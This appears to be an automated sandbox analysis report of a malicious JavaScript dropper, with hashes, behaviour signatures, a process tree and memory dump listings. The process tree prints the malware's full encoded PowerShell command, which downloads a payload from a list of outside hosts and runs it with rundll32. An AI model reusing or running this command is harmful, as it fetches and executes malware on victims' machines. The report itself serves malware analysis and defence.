Analysis

  • max time kernel
    135s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-05-2023 23:03

General

  • Target

    Belliferous.js

  • Size

    262KB

  • MD5

    4d05726e9036947c1bfa1255a3628129

  • SHA1

    a31dd440a5c23a67285248dba327b76cb3975d6f

  • SHA256

    e4024bea1eeadaf2d82a7cb32c9dcd24d84e2a4ed71f9018f6fd2365304e0163

  • SHA512

    a5109e9742f6d0ce3eec19d3ed855cbc579ecb2b461829e68081ffbb09396fcb5248473594b157fd874491b0abf9ee5a3c9e6f08938c68349e6f00134931e2fe

  • SSDEEP

    3072:UDHG+bxt2vI3a3wLK4woNhdz/aiVQ4aIvXaf6iG7Ty2Yr9fWd3BHXpjz6O:UDm+tt2vsffwo5BVLDvvpTYZudxHj

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 7 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\Belliferous.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4176
    • C:\Windows\System32\wscript.exe
      "C:\Windows\System32\wscript.exe" "C:\ProgramData\gainliest.js" administrates Bullaries melanocomous
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4180
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABOAG8AbgBwAHUAbgBjAHQAdQBhAHQAaQBuAGcAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAEEAQQB3AEEAQwA0AEEATgB3AEEAegBBAEMANABBAE0AUQBBADQAQQBEAE0AQQBMAGcAQQB5AEEARABJAEEATQBnAEEAPQB0AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANABBAEQATQBBAEwAZwBBAHgAQQBEAFUAQQBNAGcAQQB1AEEARABJAEEATgBRAEEAdwBBAEMANABBAE0AZwBBADEAQQBEAE0AQQB0AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAWQBBAFoAUQBCAHkAQQBHAEkAQQBZAFEAQgBzAEEARwB3AEEAZQBRAEEAdQBBAEgASQBBAGIAdwBCAGoAQQBHAHMAQQBjAHcAQQA9ACIAOwAkAFIAZQBsAGkAcwBoAGUAcgBTAHQAcgBlAGEAbQBzAGkAZABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA0AEEARABBAEEATABnAEEAeABBAEQAQQBBAE4AdwBBAHUAQQBEAGMAQQBOAFEAQQB1AEEARABFAEEATwBBAEEAeABBAEMAOABBAFkAUQBCAEMAQQBIAGMAQQBNAHcAQQB4AEEAQwA4AEEAZABBAEIAMwBBAEgAbwBBAFoAQQBBAD0AagBOAG0AbwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBOAHcAQQB1AEEARABZAEEATwBRAEEAdQBBAEQARQBBAE4AZwBBADAAQQBDADQAQQBNAFEAQQB3AEEARABZAEEATAB3AEIAUgBBAEYAawBBAGMAdwBCAGgAQQBDADgAQQBkAFEAQgBxAEEARABVAEEAWQBnAEIAQgBBAEEAPQA9AGoATgBtAG8AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAxAEEARABVAEEATABnAEEAeABBAEQARQBBAE4AUQBBAHUAQQBEAEkAQQBOAEEAQQB6AEEAQwA0AEEATQBRAEEAMwBBAEQAVQBBAEwAdwBCADUAQQBDADgAQQBRAHcAQgBDAEEARABnAEEAagBOAG0AbwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEUAQQBNAGcAQQB1AEEARABJAEEATgBBAEEAMwBBAEMANABBAE0AZwBBAHcAQQBEAGsAQQBMAGcAQQB5AEEARABFAEEATgBBAEEAdgBBAEYAUQBBAFoAUQBBADIAQQBDADgAQQBVAGcAQQA0AEEAQQA9AD0AagBOAG0AbwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AZwBBAHoAQQBDADQAQQBNAFEAQQB3AEEARABRAEEATAB3AEIAVQBBAEUAdwBBAFIAdwBCAG8AQQBFADQAQQBaAEEAQQB2AEEARQBZAEEAYQBRAEIANgBBAEcAbwBBAFMAZwBCAGEAQQBFAHcAQQBaAGcAQgBZAEEARgBjAEEAagBOAG0AbwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AZwBBAHoAQQBDADQAQQBOAGcAQQB4AEEAQwA4AEEATwBRAEIAaABBAEQAWQBBAE4AdwBCAHcAQQBHAFUAQQBjAHcAQQB2AEEARQBFAEEAUwBnAEIAQgBBAEcASQBBAE4AUQBBADQAQQBFADAAQQBNAGcAQgA0AEEAQQA9AD0AagBOAG0AbwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBPAFEAQQB1AEEARABFAEEATgBRAEEAMABBAEMANABBAE0AUQBBADEAQQBEAGsAQQBMAGcAQQA1AEEARABnAEEATAB3AEIAUQBBAEgAQQBBAFYAUQBCAFoAQQBGAGcAQQBMAHcAQgB1AEEARgBZAEEAVwBnAEIAdQBBAEQASQBBAGEAUQBCAEMAQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABFAG4AZABuAG8AdABlAHMAIABpAG4AIAAkAFIAZQBsAGkAcwBoAGUAcgBTAHQAcgBlAGEAbQBzAGkAZABlACAALQBzAHAAbABpAHQAIAAiAGoATgBtAG8AIgApACAAewB0AHIAeQAgAHsAJABTAHUAbgBkAGUAcgBtAGUAbgB0AEMAbABhAHkAaQBuAGUAcwBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBJAEEAYgBBAEIAdgBBAEcAOABBAFoAQQBCADMAQQBHADgAQQBiAHcAQgBrAEEAQwA0AEEAWQB3AEIAdgBBAEcAMABBACIAOwAkAEoAYQByAHYAZQB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEUAbgBkAG4AbwB0AGUAcwApACkAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAEoAYQByAHYAZQB5ACAALQBPACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFAAYQBsAGEAZQBvAGMAYQByAGkAZABhAC4AaQBtAHAAbwB0AGkAbwBuAGEAdABlADsAJABBAHMAcAByAGkAbgBnACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABNAEEATgBnAEEAdQBBAEQARQBBAE4AdwBBADAAQQBDADQAQQBNAFEAQQB5AEEARABNAEEATABnAEEAMgBBAEQAZwBBAG8AYQBhAEoAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAyAEEARABNAEEATABnAEEAeQBBAEQAQQBBAE8AUQBBAHUAQQBEAEkAQQBNAGcAQQB3AEEAQwA0AEEATQBnAEEAMABBAEQAawBBACIAOwAkAHMAZQByAGYAaQBzAGgAbAB5ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATwBRAEEAdQBBAEQARQBBAE0AdwBBAHoAQQBDADQAQQBNAFEAQQB6AEEARABNAEEATABnAEEAeABBAEQAQQBBAE4AQQBBAD0AegBRAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGEAQQBCAGwAQQBHADQAQQBlAFEAQgBzAEEARwBJAEEAWgBRAEIAdQBBAEgAbwBBAFoAUQBCAHUAQQBHAFUAQQBRAFEAQgBsAEEARwB3AEEAZABRAEIAeQBBAEcAOABBAGMAQQBCAG8AQQBHADgAQQBZAGcAQgBsAEEAQwA0AEEAWgBBAEIAcgBBAEEAPQA9ACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFAAYQBsAGEAZQBvAGMAYQByAGkAZABhAC4AaQBtAHAAbwB0AGkAbwBuAGEAdABlACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAAMgA5ADgAMwA5ADcAKQB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEAUgBBAEIAaABBAEgAUQBBAFkAUQBCAGMAQQBGAEEAQQBZAFEAQgBzAEEARwBFAEEAWgBRAEIAdgBBAEcATQBBAFkAUQBCAHkAQQBHAGsAQQBaAEEAQgBoAEEAQwA0AEEAYQBRAEIAdABBAEgAQQBBAGIAdwBCADAAQQBHAGsAQQBiAHcAQgB1AEEARwBFAEEAZABBAEIAbABBAEMAdwBBAFkAZwBCAHAAQQBHADQAQQBaAEEAQQA3AEEAQQA9AD0AIgA7ACQAUwBwAGUAeQBlAHIAaQBhAFMAbwBuAG8AcgBpAHoAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAYwBBAGEAUQBCAHkAQQBHAFUAQQBaAEEAQgBoAEEARwA0AEEAWQB3AEIAcABBAEcANABBAFoAdwBCAFQAQQBIAGsAQQBjAHcAQgAwAEEARwBVAEEAYgBRAEIAcABBAEgAbwBBAFkAUQBCADAAQQBHAGsAQQBiAHcAQgB1AEEAQwA0AEEAWgB3AEIAMQBBAEgASQBBAGQAUQBBAD0AWgBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AZwBBADIAQQBDADQAQQBNAFEAQQA1AEEARABRAEEATABnAEEAeABBAEQATQBBAE8AUQBBAHUAQQBEAGMAQQBNAGcAQQA9AFoAYQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAEkAQQBaAFEAQgB0AEEARwBrAEEAWgB3AEIAeQBBAEcARQBBAGQAQQBCAHAAQQBHADQAQQBaAHcAQQB1AEEARwB3AEEAWQBRAEIAdQBBAEcAUQBBACIAOwBiAHIAZQBhAGsAOwB9AH0AIABjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADIAOwB9AH0A"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1676

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\gainliest.js

    Filesize

    262KB

    MD5

    4d05726e9036947c1bfa1255a3628129

    SHA1

    a31dd440a5c23a67285248dba327b76cb3975d6f

    SHA256

    e4024bea1eeadaf2d82a7cb32c9dcd24d84e2a4ed71f9018f6fd2365304e0163

    SHA512

    a5109e9742f6d0ce3eec19d3ed855cbc579ecb2b461829e68081ffbb09396fcb5248473594b157fd874491b0abf9ee5a3c9e6f08938c68349e6f00134931e2fe

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kjo3jyik.wo4.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/1676-135-0x00000204B6A40000-0x00000204B6A62000-memory.dmp

    Filesize

    136KB

  • memory/1676-146-0x00000204B6A70000-0x00000204B6A80000-memory.dmp

    Filesize

    64KB

  • memory/1676-145-0x00000204B6A70000-0x00000204B6A80000-memory.dmp

    Filesize

    64KB

  • memory/1676-147-0x00000204B6A70000-0x00000204B6A80000-memory.dmp

    Filesize

    64KB

  • memory/1676-148-0x00000204B6AF0000-0x00000204B6D0C000-memory.dmp

    Filesize

    2.1MB

  • memory/1676-149-0x00000204B6A70000-0x00000204B6A80000-memory.dmp

    Filesize

    64KB

  • memory/1676-150-0x00000204B6A70000-0x00000204B6A80000-memory.dmp

    Filesize

    64KB

  • memory/1676-151-0x00000204B6A70000-0x00000204B6A80000-memory.dmp

    Filesize

    64KB